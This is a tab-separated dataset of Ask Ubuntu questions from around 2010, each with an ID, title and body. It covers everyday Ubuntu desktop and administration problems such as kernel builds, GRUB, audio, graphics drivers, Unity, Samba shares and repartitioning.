10435	get root access for copying files to /usr/share/ ... ?	to be short , i want to copy a folder to a location /usr/share/screenlets/ ... . in ubuntu 10.04 system . i tried by logging in as root from terminal giving su . i even changed my user account type to administrator ; yet , no use . paste option in the context menu 's list in the folder /usr/share/ ... is inactive . how can i copy those files ?
10438	how come you do n't need sudo privileges to update the packages list in the 10.10 update manager ?	i have noticed that when i press the `` check '' button from the update manager in maverick , it starts directly downloading the information on packages without asking me my password ( sudo verification ) like it used to be in 10.04 and before . i 'm wondering why so because in the terminal , you 've still got to be sudo to execute an `` apt-get update '' .
10440	upgrade manager just closes	i keep on trying to upgrade this pc , but after getting the upgrade tool the distribution window closes and does not remember that i have tried upgrading . is their any solution to this problem ? i am upgrading form 10.04 to 10.10 . thank you .
10443	how do i rip cds with sound juicer over x11 forwarding ?	i am trying to rip a cd with sound juicer over x11 forwarding ( cd is in the desktop across the room , i 'm sshing in from my laptop ) , but sound juicer can not find my cd drive . it works correctly when i am logged in directly to the machine in a gnome session . my user is in the cdrom group . i suspect that some combination of udisks , policykit , and consolekit is to blame â that it is configured to allow users with active console sessions to enumerate and/or access drives , but not other users . how can i configure my system to allow me to access this ? i can not seem to locate any policykit or consolekit configuration programs like i seem to remember fedora having when they rolled out policykit ? the other option i see , which i find to be unlikely , is that sound juicer requires some gnome session services to be running in order to locate the drive . update : based on the accepted answer , it does require gnome session services , namely a d-bus session bus by which it can run gvfs . if sound-juicer fails , running dbus-launch sound-juicer works . alternatively , dbus-launch can be hooked in to your login scripts to run at ssh login .
10451	what protocol does empathy 's `` people nearby '' use , and what other chat programs use it ?	what is the name of this protocol ? can i interact with people using other chat programs , like pidgin on linux or adium on os x ? which programs recognize it , and which do n't ?
10452	setting up gitweb/apache2	i have recently began storing code , that i write on a local server i have at home . i was hoping to start a gitweb instance at home so i can see commits and track progress with my other team mates . i have tried server tutorials online with no luck . i would like gitweb to be accessed by example.com/git i would like my code to be place in /code/git i would appreciate any help ! please try to be explicit as possible , because i clearly dont know what i am doing . i have read tons of articles . please and thank you .
10455	how do i mount a digital camera via the command line ?	when i plug in in my digital camera ( fuji f100fd ) , nautilus automounts it as 'usb ptp camera ' with the path 'gphoto2 : // [ usb:001,007 ] / ' . lsusb lists it as bus 001 device 007 : id 04cd:02ef fuji photo film co. , ltd dmesg says usb 1-3 : new high speed usb device using ehci_hcd and address 7 how can i mount it from the command line ( not running gnome/x ) ?
10457	how to enable the boot splash screen ?	after hitting enter from grub , the screen displays a blinking cursor . how can i enable the loading screen , so that the boot splash screen displays instead of a blinking cursor ? ?
10458	how can i use my own image for the boot splash screen ?	how can i create and use my own boot splash screen ?
10459	problem using `` slash character '' / key-shortcut	a few hours ago , the only shortcut for the `` slash character '' fn+0 stopped working in my ubuntu environment . i know it is not a physical error , because it is still working on my '' root user '' . what can i do about it ?
10464	how to build mainline kernel and make it show up on grub ?	after successfully compiling and building my mainline kernel ( 2.6.32.25 ) under my ubuntu 10.04 with these headers i was wondering : how to make this kernel on startup , so i can choose which one to boot ? i have grub2 ( grup-install -v says : 'gnu grub 0.97 ' ) installed . i tried this : sudo make install and got : luky @ ubuntu1004 : /usr/src/linux-2.6.32.25 $ sudo make install sh /usr/src/linux-2.6.32.25/arch/x86/boot/install.sh 2.6.32.25 arch/x86/boot/bzimage \ system.map `` /boot '' here 's my /boot folder : luky @ ubuntu1004 : /boot $ ls abi-2.6.32-24-generic system.map-2.6.32-24-generic config-2.6.32-24-generic system.map-2.6.32.25 config-2.6.32.25 vmcoreinfo-2.6.32-24-generic grub vmlinuz-2.6.32-24-generic initrd.img-2.6.32-24-generic vmlinuz-2.6.32.25 memtest86+.bin i would not like to have to manually change grub 's config files .
10465	poor sound quality and headphones not working	i 'm running ubuntu 10.10 and my soundcard is a realtek alc880 , with intel hda controller . i have a very low sound , and , when i raise the volume over 50 % , it sounds `` cracked '' . when i plug the headphones in , it keeps on playing through the speakers ( and the headphones do n't play any sound ) . in windows , it sounds fine , and the headphones work well . please help !
10468	can you get computers with ubuntu preloaded in the uk ?	i found some places which sell computers in the us that have ubuntu preloaded but not in the uk . can you buy computers with ubuntu preloaded in the uk ? thank you !
10472	different kernel between ubuntu	i have a pc with ubuntu karmic and the kernel that i have is 2.6.31-22 i have another pc with ubuntu maverick and the kernel is the last one . that means that karmic doesnt upgrade the kernel to the last one ? ? because ive already installed all the upgrades proposed . i 'm not sure how that of kernels work .
10480	i have two system informations display	hey ! i have upgraded from 10.04 to 10.10 using the the apt-get dist-upgrade command . everything went ok ( at least for now everything seems to be working ) but now when i login via ssh i get two system informations display , the first from 10.10 abd the second from 10.04.1 lts what did i do wrong ?
10481	how do i enable or disable the global application menu ?	i 'm fairly excited for unity , as it looks like a promising new direction for ubuntu . however , i do have a concern - will it be possible to use unity without the global menu ? i have my window manager set to focus-follows-mouse/sloppy focus , and find the productivity gains to be immense . sloppy focus is incompatible , however , with global menus , as it is possible for the focus to change while you move from window to menu . will unity support an option to use window menus while still using unity ?
10483	kernel panic : unable to mount root fs after building mainline kernel	similar problem as reported by another user . while booting , the system ca n't find /dev/sda1 and so a `` kernel panic : unable to mount root fs on unknown-block ( 0,0 ) '' appears on screen . i 'm compiled & built kernel linux-2.6.32.25 on ubuntu 10.04 running in virtualbox virtual machine . ps . : the update-initramfs , update-grub did n't work out for me .
10487	how do i get unionfs installed ?	i 'm trying to use unionfs in ubuntu 10.10 , but it seems it is no longer in the apt repositories , and it does n't show up in /proc/filesystems , and there is no module for it anywhere under /usr . this used to exist before jaunty in the `` unionfs-tools '' package . how do i get unionfs installed in ubuntu 10.10 ?
10490	mame , kxmame , gmameui not working after upgrade	in previous releases , mame and kxmame were working fine , but not any more since 10.10 . both front ends ask for the executable path , but no matter which i choose , they do n't work . does anyone know how to fix this ?
10494	why four tasks named kslowd eat cpu time ?	i installed unity on my belinea o.book 13011 . now there are four tasks named kslowd000 to kslowd003 . each task uses 10-15 % cpu , expect there is another task that needs more . so the cpu fan is running continously . how can i fix that ?
10495	scaling governor throws permission error for su	my cpu is burning it self if i dont put it powersave state . recently widget on the top of my screen says 800mhz but i know it is 1.733ghz behind . i feel it because temp . passes 80 celcius ( 176 fahrenheit ) . temp . is another problem , but i want to issue that command ! nerkn @ nerkn-laptop : /var/www/onyuz $ sudo echo -n powersave > /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor but it throws bash : /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor : permission denied i cant cry to say i 'm super ! super user , no permission i know ! can any body suggest any thing ?
10500	take picture from bootmenu ( grub2 )	is there a possible way of taking a picture of my bootmenu ? example : http : //t1.gstatic.com/images ? q=tbn : xolnrxyhahn-fm : http : //i3.photobucket.com/albums/y71/cocasoca/grub2.jpg & t=1 ( note : cellphone pictures are excluded - > i have a low pixel cellphone cam : ( )
10502	create a wifi hotspot using my desktop	my desktop has a fast wired connection and i would like to set up a sort of `` wifi hotspot '' that allows mobile devices to connect to my pc and share this fast connection . how would i go about doing this ?
10503	how can i see what happens during the boot process ?	on my machine booting takes more than a minute which is annoying when i see that windows 7 boots in 20 seconds . here is what i get when the machine is booting . how can i see what happens when booting up ?
10508	optimizing boot-up	i installed bootchart to monitor my boot-up process . i had some problems with my booting time ( > 80sec ) before : http : //i.stack.imgur.com/4tvky.png after some tweaking with bum , ubuntu-tweak and start-up manager i reached ( > 30sec ) after : http : //i.stack.imgur.com/f4pyf.png is it good ? or is there room for more ? what boot-up time ( range ) is normal ? ( of course it depends , but on default setting on a mid/high-tech pc )
10509	black screen when i start google earth ?	when i start google earth on ubuntu it shows a black screen . it used to work but one time it show a black screen . i tried installing it again and rebooting and everything but it did n't work . what is wrong ?
10519	how can i get compiz to work in a virtualbox vm	is there any way to get compiz'z fancy graphics to work in a virtualbox vm . ... and would it be too slow via a virtual video-card ? ... is it possible to actually hook into the host 's own physical video card ? .. or maybe use a second dedicated physical video card ? update janc 's method works fine for me . i had already installed virtualbox-guest-addition ... ( i 'm using lucid ) to uninstall this virutalbox addon pack , run its installer with uninstall added to the end of the command line . ( the other packages janc mentioned seems to replace its functionality ) ... in my case the command was : sudo vboxlinuxadditions-x86.run uninstall
10521	how to scroll in the terminal app `` top '' ?	i 've read the info page , but i ca n't find any way to scroll the list in top . maybe there is no way to scroll ? ... but there must , at least , be some way to filter the list , and i ca n't find that either . how do i display line-entries which are off the page ?
10524	usb drive login token system ?	is it possible to have a usb drive function as a login token ? ie : i turn on my computer , plug the usb drive into my system and the system recognises it and logs me in ? likewise , logs me out should the drive be removed ? thanks in advance : )
10525	how can i make the volume change in smaller increments ?	when i press the volume up/down keys on my keyboard , the volume changes too much . how can i make the step size smaller so that i have finer control ?
10527	system time keeps changing	i 'm dual booting ubuntu 10.04 with windows 7 , which i setup using wubi . after logging in to the system , i noticed the time at the top panel is wrong and i changed it to the correct time . but as it turns out the problem does not stop there . the time keep changing and today ( 31th october ) i fixed the time twice , but after few minutes it shows a wrong time again . even the date is wrong . ( shows 1st november ) what maybe wrong with the system ?
10531	how to open new im in empathy ( instead of having to clicking envelope ) ?	is there a way to configure empathy so that when a new im arrives i can open it using a keyboard shortcut rather than having to click the envelope icon of the indicator applet ?
10532	how to format btrfs partition ?	how to format spare disk space to btrfs filesystem ? i ca n't see btrfs in format dialog neither in gparted , nor in disk utility . only fat , ext2 , ext3 , ext4 etc .
10534	unable to use built-in mic on lenovo thinkpad x300 due to regression bug from 1 year ago	i 'm using a liveusb of ubuntu 10.10 to see if this bug i reported in aug 2009 has been fixed . sadly , it seems like it has not . this is what i did to test : i booted with a ubuntu 10.10 liveusb , i updated everything using synaptic : including pulse and other sound related packages , everything except the kernel . after that i opened sound preferences , made sure sound input was not muted , moved the input volume all the way , opened sound record and tried to to record some sound . i could hear only static . basically i can not get any sound from the microphone that is on the chasis of this lenovo x300 laptop . my theory is that pulse or alsa are only able to get sound input if i connect an external mic to the jack . i tried using an external mic a few months ago and it worked . but i do n't want to use external mics , i want to use the mic on the laptop itself . any suggestion on how to solve this problem ?
10537	how do i remove partitions in the 'places ' section of the gnome file dialog ?	in the gnome file dialog under 'places ' i can add and edit bookmarks to directories . that list however not only contains my bookmarks , but also a list of all partitions on the system that gnome seems to gather automatically . i ca n't edit that list as the right-click-menu items for that are grayed out . how can i get rid of those automatically generated entries and limit it to just my bookmarks ?
10542	nvidia geforce 8500 gt , dell u2311h monitor , dvi-d cable issue	i 've have my dell u2311h monitor working fine at 1920x1080x60hz using the dvi-d cable that came with it ( 18 pin , single-link ) . when i try and attach a longer 5m cable which supports dual-link ( 24 pins ) the monitor does n't work and displays the following message : '' the current input timing is not supported by the monitor display . please change your input timing to 1920x1080 @ 60hz or any other monitor listed timing as per the monitor specifications . '' nothing else changes except the cable , rebooting does n't help . as far as i understand , dual-link cables should be backwards compatible with single-link . weirdly , in nvidia-settings it says dfp-0 has `` connection link : dual '' what could be causing this ? is there some way in xorg.conf to force it to single-link mode ? there does n't seem to be any option on the monitor other than selecting the dvi-d input . update : since it seems to be the cable length causing the issue ( see my answer below ) , is there a way to save the edid info correctly returned with the short cable and force it to be used with the long cable ?
10543	what does this startup dialog message mean `` could not update iceauthority file ''	i restarted ubuntu a few minutes ago , and got a warning dialog early in the bootup process ( before the desktop was up ) ... it was n't just a scrolling message which flitted off the screen of its own accord . it was a dialog which stopped proceedings , until i acknowledged it . could not update iceauthority file /home/me/.iceauthority what , why , and who dun it ? : )
10547	how to clean launch a gui app via the terminal ( so it does n't wait for termination ) ?	some gui apps launch cleanly via the terminal command line . some do n't , and they cause the terminal to wait for the app to terminate . ... and even then , some do n't `` release '' the command line . the mysterious ampersand `` & '' suffix , seems to cause the terminal to put the process into the background ... ( but i 'm not sure what happens there ) . is there a way to launch an app via the terminal , so that there is no `` hang on '' effect ? ... just like launching something via f2 . i 'd like to have the command line available again , immediately ( without something still in the background and writing out system message in the terminal ) .
10548	will there be a derivative with gnome 3 ?	i just wonder , will there be a separate version with gnome desktop ( gnobuntu/gbuntu or something ) ? i think there are many users including me who like gnome . please do n't take gnome away from us .
10550	thunderbird wo n't remember that i 've turned off global search and indexing	i 've turned off thunderbird 's `` global search and indexing '' over and over again . i 've deleted the global-messages-db.sqlite file more than once . this works for one session , but as soon as i restart my computer , thunderbird goes back to using the global search and indexing . ( though it looks like it is n't being used under preferences . ) any ideas how i can get thunderbird to remember ? thanks so much .
10554	how can i listen last.fm radio in banshee ?	can i `` love '' tracks ( on last.fm ) that i 'm listening to from banshee ? i know rhythmbox can , but i see no such button in banshee .
10561	how to install on a macbook air 3,2 without an external cd drive ?	i 've got a new macbook air which i 'd like to install ubuntu on . it has no internal optical drive , i have no external one . i do have the ability to partition the disk and also have a usb flash drive and usb external hard drive . none of these i 've been able to successfully boot the ubuntu installer with though . so ... how can i install ubuntu on a macbook air 3,2 ? thanks in advance .
10568	unity crashes when i move the cursor over it	i insalled it on a desktop to try the unity interface ( netbook ) since it 'll be standard in the next release . the whole gui reloads when i move the mouse over the menus . sometimes it locks up and i have to alt-f4 reboot . i 've tried both the ubuntu nvidia driver and the one from nvidia 's site . gnome 2 and 3 work fine with 3d effects ... help ? thanks !
10571	how to install grub on usb flash drive ?	i was wondering if i could make an os-selecting-hardware-key or something like that . i 'm currently using a dual boot system ( ubuntu 10.10 + win7 ) and i want to use an usb drive to specify the os i want to boot . so if the usb key is plugged in during the boot , it will start one operating system , if it is n't , it will boot the other one . i want to edit my currently installed grub to recognize only one os , and install a second grub to the usb key , with the other os in it . after that i just need to set up booting from the usb key in the bios . i may be completely wrong about it , but mainly i need some advices how to install grub ( 2 ) on the usb key .
10572	panel has really wide clock	on starting my kubuntu 10.04 the other day i got something like this how do i make the clock a normal size so that there is room for my windows ?
10573	how can i become active in the ubuntu community	i have used ubuntu for a while and want to find a way to give back to the community and help ubuntu get better ; is there a team in the ubuntu community that is dedicated to helping users transition from user to contributer ?
10578	how do i make banshee re-scan for cover art ?	i restored my banshee db as per this question . my music and listening history shows up as expected , but the cover art is missing , and banshee wo n't scan for it . `` rescan music library '' does n't check for cover art . neither does disabling/re-enabling the cover art plugin . i ca n't find an option to do this -- is it possible ?
10580	how can i burn a bootable dmg image ?	i have a bootable dmg image and i need to burn it to a double layer dvd ( the only one i have right now ) . i do n't have mac just my ubuntu pc and i heard it 's possible but searching google did n't answer my question . so would you please tell me how can i do that without damaging the file or the only dvd i have right now ?
10581	how does ubuntu mount the encrypted home folder when accessing it over samba ?	i 'm puzzled . as far as i understand it , the user folder /home/user is encrypted with the users password . connecting through smb to the computer does somehow decrypt the user 's folder . how is this done ? smb does n't transfer the password normally . also , i 'm trying to achieve something similar using pam_mount , but there are some limitations . what software does ubuntu use to mount its encrypted file systems ?
10583	ibus systray icon wo n't disappear	i 'm on ubuntu 10.10 and when i uncheck the `` show icon on system tray icon '' on the ibus setup window , it disappears without a problem . but after reboot , the icon reappears on notification bar , even if the option above is unchecked . i even checked gconf , but ca n't find a solution .
10586	right click menu on mouse release ( windows behavior )	i 'm trying to change the behavior of the right click menu in ubuntu 10.10 because i use windows 7 and ubuntu . when you right click you need to hold the right click and select something . in windows the is different right click ( release ) select something with left click is there a way to change this in ubuntu ? i 'm running the ubuntu in vmware 7 is that behavior normal ?
10587	recommendations for a touchscreen laptop	which touchscreen computers work best with ubuntu ? i 'm looking for one and am wondering what the best one is .
10590	what does `` selecting previously deselected package '' mean ?	whenever i install software from the command-line using apt-get or aptitude , i see messages like this : selecting previously deselected package foobar-cil-dev . i understand `` downloading '' and `` setting up '' , but what does `` selecting '' mean ? and what does it mean that the package was `` previously deselected '' ?
10595	ca n't use tethered wifi	i have a dell mini 9 netbook with ubuntu 10.04 netbook remix . i can get on my home wifi fine , but when i try to connect to a tethered connection ( on my palm pre phone ) , it wo n't connect , even though it sees the connection . even if i turn off encryption , it still wo n't connect . i can connect to the tethered connection fine from my win7 laptop ( even with encryption ) .
10597	can i use gnome applets in unity ?	applets are small programs that you attach and start from the gnome 's toolbar . see picture : http : //www.futuredesktop.com/audio-recorder/recorder-applet.ogv my favourite applets are : rec-applet : smart audio recorder applet . you can get this from launchpad . clipart-finder : find and download clipart to your computer . you can get this from the launchpad . 1 ) can i use these applets in unity as is ? 2 ) what changes i have to make to applets ' code ( rec-applet and clipart-finder ) to make them usable in unity ? 3 ) where is the applet-specification for unity ?
10601	nautilus wants a password when i try connecting to a public windows share	there is a computer on my network running windows 7 professional with a bunch of shared folders and printers available on the default workgroup domain . there is no password for any of these shares and they can be happily accessed from windows on any other computer on the network . ( and all the windows computers can access ubuntu 's samba shares ) . if i use the network place in nautilus , the computer itself is visible under smb : //workgroup/ . however , when i try to mount that , nautilus asks me for a password ! with no other option , i entered the username and password for the one user on the machine . it tried to do something for a second then asked again ( ad infinitum ) . trying to add a printer with cups is equally broken . its various interfaces have given me “unable to connect to cifs host” and “nt_status_invalid_parameter , ” but i 'm not sure if it 's the same problem . if we can figure out the file shares first , maybe that will explain itself . samba itself should be almost pristine . i have not touched any configuration files ; just added some shares through the folder sharing options in nautilus ( nautilus-share ) . any idea what 's going on here ? : )
10602	how to fix apt-get autoremove ?	the apt-get autoremove command does not have any effect in maverick . how can i solve that ? edit : restoring a vm backup containing a clean install solved the problem .
10605	will it be possible / desirable to port unity back to mutter at some point ?	as far as i know , there are plans to port unity from mutter to compiz due to some performance problems caused by the first . if these problems with mutter are fixed at some point in the future , and considering that stock gnome uses mutter , would you consider porting back to it ? would it still be technically possible ?
10606	will the unity `` file manager '' feature right-clicks ?	one thing that disturbs my workflow with unity is that i can not right-click on items in the `` file browsing mode '' . for example , if i want to open a photo not with eog but with shotwell editor , i first of to open the file by left-clicking on it , and then select `` edit with ... '' . simply right-clicking on it would be much easier . the menu could be implement to look similar to those when you right-click on a launcher icon . are there any plans to implement such a functionality ?
10607	what mass file renaming tools are available ?	i need to rename a bunch of files in order to fix their sort order , therefore i need to be able to do a sort of `` find and replace '' so i can replace chunks of the filenames at a time . what tools should i use ? i prefer gui but a command line tool recommendation would also be fine .
10609	how to enable 3d in vmware player ?	i want to test unity in a vm using vmware player . i have already enabled 3d acceleration in the display options and i have vmware tools installed . however , when i try to run unity or when i try to enable effects in appearance menu , it does n't activate . jockey says there is only one video driver available , which is enabled already . i do n't want to use virtualbox .
10617	how to exchange/remove/overwrite a pdf 's background ?	as the title says i want to change background of a pdf . this are some slides , and to save toner i thought it would be good to change the background to white . i tried pdftk with its operations : background and stamp , but the do n't work as expected : pdftk old.pdf background white.pdf output out.pdf pdftk old.pdf stamp white.pdf output out.pdf i also tried convert ( bloating my pdf upto 200mb ) as done this way : convert old.pdf -background white new.pdf with no luck . do you know a way i could perform this ?
10618	will compiz in unity use emerald as its window decorator ?	sorry if that 's a dumb question .
10622	how can i enable ctrl+alt+backspace ?	ctrl+alt+â can usually be set to restart x , however i ca n't find the option to allow this ( it is disabled by default ) . i have looked in system- > preferences- > keyboard and system- > preferences- > keyboard shortcuts but i ca n't find an option to enable it . where can i change this setting ?
10626	ubuntu one connection failed	i have installed ubuntu 10.10 . then i try to connect ubuntu one . i can enter my login , but in the preferences name and e-mail are `` unknown '' . u1sdtool -- status state : auth_failed connection : with user with network description : auth failed is_connected : false is_error : true is_online : false queues : idle i tryed also to remove the computers on https : //one.ubuntu.com/account/machines/ but `` something has gone wrong '' this also does not help https : //wiki.ubuntu.com/ubuntuone/status # general+and+accounts soemthing goes terribly wrong . any idea ?
10635	how can i install sqlite to be used with openoffice ?	my gps uses a sqlite database . i would like to access this data using openoffice to look at the relationship between data entries . is there a way to install sqlite with openoffice ?
10640	is there a teminal command to get the most recently created file or folder ?	i often need to do something like command most_recently_created_file_or_folder from the terminal . i 'd appreciate any help .
10644	how do i limit accounts ?	i am trying to set up ubuntu for a school and obviously there needs to be limitations , how would i be able to limit access to certain programs , like the terminal , gparted , system monitor ... the ability to modify the gnome panel installation of any type of software viewing of any directory outside the home folder ( with the exception of removable storage devices ) the ability to run any executable files located in the users home folder or any removable storage device if you guys could help me on this i would be extremely grateful .
10647	auto starting a program before any other program and preventing it to run the other programs until a directory is mounted	well the title says it all , how can i auto-start a program before anything else and prevent any other program from running until a certain directory is mounted ? i am building a front-end program for the command `` ncpmount '' and it has to prevent any program from running until the user logs into their remote account and their files become mounted .
10652	disable 'create a mailing-list ' option	how to disable `` create a new mailing list '' option showing up on admin page for public . example : http : //mm.gnu.org.in/cgi-bin/mailman/admin
10655	dell mini 10 mouse pad problems	after going from 10.04 - 10.10 ( not upgraded , completely reinstalled because of upgrade issues ) i found a weird problem with my mouse pad . whenever i clicked on the left or right mouse buttons ( integrated into the touch pad ) when i released them , it seemed like it was detecting a double click and ended up choosing the option the mouse was hovering over . has anyone else experienced issues like this , and if it is possible , could i fix it ?
10659	how can i stop windows from always booting first ?	i tried to make a dual boot setup on my computer . already had windows 7 installed on one hard drive , then tried to install ubuntu on part of another hard drive . when i turn my computer on windows7 always boots , there is no option to select which os to boot regardless of the order i put the hard drives to boot from in the bios this always happens . if i remove the hard drive with windows on it instead of booting ubuntu it just says there is an error - windows ca n't boot because something is missing . after installing ubuntu it said everything was fine . something else which may help : originaly i had kubuntu installed before windows but when i insstalled windows 7 i could no longer get to it and just stopped uing it . how can i stop this from happening so that i can boot into ubuntu ?
10662	comma input is missing in vim insert mode	well , this is not a ubuntu specific question but here it is anyway . i 'm using vim 7.2 with ubuntu 10.04 . i installed vim about a day ago using apt-get so it 's not the default version you get with the system . here 's the problem , whenever i type text in to a text file in vim 's insert mode the comma character does not appear . no matter how many times i press the comma button it wo n't display it or add it to the text file . is there something wrong with the character mapping in vim ? any suggestions for fixing this ?
10664	how do i fix `` ubuntu is running in low-graphics mode ? ''	first off , i 'm running ubuntu 10.04 on a 30gb partition , the rest of my hdd is for a vista partition . the way i installed this was , i shrunk the vista partition and installed ubuntu in the largest block of free space . ubuntu has been working fine for a few weeks , and i 've loved it , but today i was doing something in vista ( something simple ) and i restarted to go back into ubuntu , and when it tried to boot up i got a message that said : `` ubuntu is running in low-graphics mode . your screen , graphics card , and input devices could not be detected correctly . you will have to configure these yourself . '' i click ok , and it gives me a few options but all of them are dead ends . basically , i 'm stuck in cli right now without a clue of how to fix it . i 've tried doing a full update and it has n't made a difference . i 've already been asking for help in # ubuntu and # radeon and i was directed by some of them here , so i hope i can find some answers here . also , i 'm using an ati radeon x1200 . any help would be greatly appreciated . another thing , while i was trying to get help in # radeon i was told that it could possibly be this bug .
10667	how can i change location of login dialog in gdm ?	how can i change location of login panel on ubuntu 10.10 start up page , where entering password . i want to move it down and now it is in center of screen thank you
10671	install ubuntu 10.10 on virtual machine	i 'm trying to install ubuntu 10.10 on virtual machine on my pc , i tired vmware workstation 7.0 , vmplayer 3.0 , and oracle virtual box . i have the same issue on 3 application , ubuntu boots very well and login to the ( test ) desktop and everything disappear and the machine reboot again . anyone have a solution for this issue ?
10673	unable to access https	i 'm using ubuntu 10.04 . few days back i installed some files from update manager and restarted my system . now i 'm not able to access any of https sites and in all browsers i face the same problem . can any one help me out . installed the following packages : icedtea6-plugin ( 6b18-1.8.1-0ubuntu1 ) libaccess-bridge-java ( 1.26.2-3 ) libaccess-bridge-java-jni ( 1.26.2-3 ) openjdk-6-jre ( 6b18-1.8.1-0ubuntu1 ) upgraded the following packages : firefox ( 3.6.11+build3+nobinonly-0ubuntu0.10.04.1 ) to 3.6.12+build1+nobinonly-0ubuntu0.10.04.1 firefox-branding ( 3.6.11+build3+nobinonly-0ubuntu0.10.04.1 ) to 3.6.12+build1+nobinonly-0ubuntu0.10.04.1 firefox-gnome-support ( 3.6.11+build3+nobinonly-0ubuntu0.10.04.1 ) to 3.6.12+build1+nobinonly-0ubuntu0.10.04.1 e2fslibs ( 1.41.11-1ubuntu2 ) to 1.41.11-1ubuntu2.1 e2fsprogs ( 1.41.11-1ubuntu2 ) to 1.41.11-1ubuntu2.1 libc-bin ( 2.11.1-0ubuntu7.4 ) to 2.11.1-0ubuntu7.5 libc-dev-bin ( 2.11.1-0ubuntu7.4 ) to 2.11.1-0ubuntu7.5 libc6 ( 2.11.1-0ubuntu7.4 ) to 2.11.1-0ubuntu7.5 libc6-dev ( 2.11.1-0ubuntu7.4 ) to 2.11.1-0ubuntu7.5 libc6-i686 ( 2.11.1-0ubuntu7.4 ) to 2.11.1-0ubuntu7.5 libcomerr2 ( 1.41.11-1ubuntu2 ) to 1.41.11-1ubuntu2.1 libss2 ( 1.41.11-1ubuntu2 ) to 1.41.11-1ubuntu2.1 python-papyon ( 0.4.8-0ubuntu1 ) to 0.4.8-0ubuntu2 ttf-symbol-replacement ( 1.1.42-0ubuntu4 ) to 1.2-0ubuntu6~lucid5 update-manager ( 1:0.134.10 ) to 1:0.134.11 update-manager-core ( 1:0.134.10 ) to 1:0.134.11 update-manager-kde ( 1:0.134.10 ) to 1:0.134.11 wine ( 1.1.42-0ubuntu4 ) to 1.2-0ubuntu6~lucid5 wine1.2 ( 1.1.42-0ubuntu4 ) to 1.2-0ubuntu6~lucid5 firefox ( 3.6.10+build1+nobinonly-0ubuntu0.10.04.1 ) to 3.6.11+build3+nobinonly-0ubuntu0.10.04.1 firefox-branding ( 3.6.10+build1+nobinonly-0ubuntu0.10.04.1 ) to 3.6.11+build3+nobinonly-0ubuntu0.10.04.1 firefox-gnome-support ( 3.6.10+build1+nobinonly-0ubuntu0.10.04.1 ) to 3.6.11+build3+nobinonly-0ubuntu0.10.04.1 libnspr4-0d ( 4.8.4-0ubuntu1 ) to 4.8.6-0ubuntu0.10.04.2 libnss3-1d ( 3.12.6-0ubuntu3 ) to 3.12.8-0ubuntu0.10.04.1 thunderbird ( 3.0.8+build2+nobinonly-0ubuntu0.10.04.1 ) to 3.0.9+build1+nobinonly-0ubuntu0.10.04.1 xulrunner-1.9.2 ( 1.9.2.10+build1+nobinonly-0ubuntu0.10.04.1 ) to 1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1 i think problem with this libnss3-1d may be .
10675	is client side decoration ( csd ) dead ?	as stated by kwin developer martin : http : //blog.martin-graesslin.com/blog/2010/10/kwin-at-uds/ i just wanted someone to confirm it ... : - )
10679	choppy/unresponsive keyboard and mouse pointer until suspend	i had a problem where my mouse and keyboard would be choppy . the mouse pointer would work at `` 1-2 fps '' and the keyboard would keep missing letters as i was typing them . since both are usb-devices , i suspected a problem there immediately , so whenever i got this problem , i would suspend the computer and start it again , for the problem to be gone . the problem started appearing when i plugged the mouse and keyboard directly into the computer rather than the usb-hub in the screen . i 'm using a logitech ultrax flat and a razer lachesis , on a dell latitude e6510 .
10681	is there a way to equalize ( i.e . drop the bass of ) videos ?	i have very bassy speakers , and when i watch videos at night , i either ca n't understand the people talking , or have too much bass for my neighbors . is there a way to drop the basses of the audio output ? like maybe an audio `` proxy '' , or a video player with built-in equalizer ( like audacious or xmms have for music ) . i tried mplayer 's equalizer function , but it somehow did n't work .
10682	is chromium still under consideration for unity ?	during uds-m there were discussions to include chromium as the default browser for the - back then - netbook edition . however , it was opted to stay with firefox . have there been further discussions at uds-n about this issue ?
10683	why does network manager always ask for my keyring password ?	this is a small nuisance i 've had in ubuntu forever . when i set my computer to login automatically , network manager asks me for my keyring password every time it boots and it refuses to connect to the internet until i enter it . is there a reason for that ? also , other network managers such as connman do n't have this problem , and i have noticed the latter also has an application indicator while nm-applet runs in the notification area . are there plans to migrate to connman , or to adapt nm-applet for natty ?
10688	why are the memenu and the messaging applet two separate things ?	when i look at them , their functionality seems to overlap so much that they could almost be merged : the ma is used to open gwibber , but the mm is used to set the accounts and broadcast messages . the ma is used to open empathy , but the mm is used to set the accounts and set a status ( available , busy ... ) . all these could well be in different sections , either in the ma or the mm : chat ( set status , accounts ) . mail ( send mail , contacts ) . broadcast ( send message , accounts ) . ubuntu one . about me . so , why the decision to split them in two different indicators , thus taking extra space in the panel ?
10690	how do i change from dual-boot windows/ubuntu to single-boot ubuntu ?	i have an old vista laptop that i partitioned and installed ubuntu on , with dual-boot . i 've now decided to switch entirely to ubuntu . what 's the best way to achieve this ? my current partitions : + -- -- -- -+ -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | winre | c : ( dual bootable ) | d : | extended | | | | + -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- + | | | + ubuntu | swap | + -- -- -- -+ -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- + i 'd like to change this to : + -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | winre | extended | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + | | ubuntu ( bootable ) | swap | + -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + ( i 'd like to keep the windows recovery partition in case i ever want to sell the laptop ) . i 'm not sure whether the ubuntu partition currently has a boot-loader on it . i also do n't want to lose my ubuntu installation/data . ( i 'm happy to trash the windows partitions completely - i have backed everything up from those ) . update : having checked my bootloader , i 've deleted the windows partitions and i now have free space . unfortunately it looks like i ca n't resize the existing / ( root ) partition because it 's mounted . can i get around this , or do i have to re-install ?
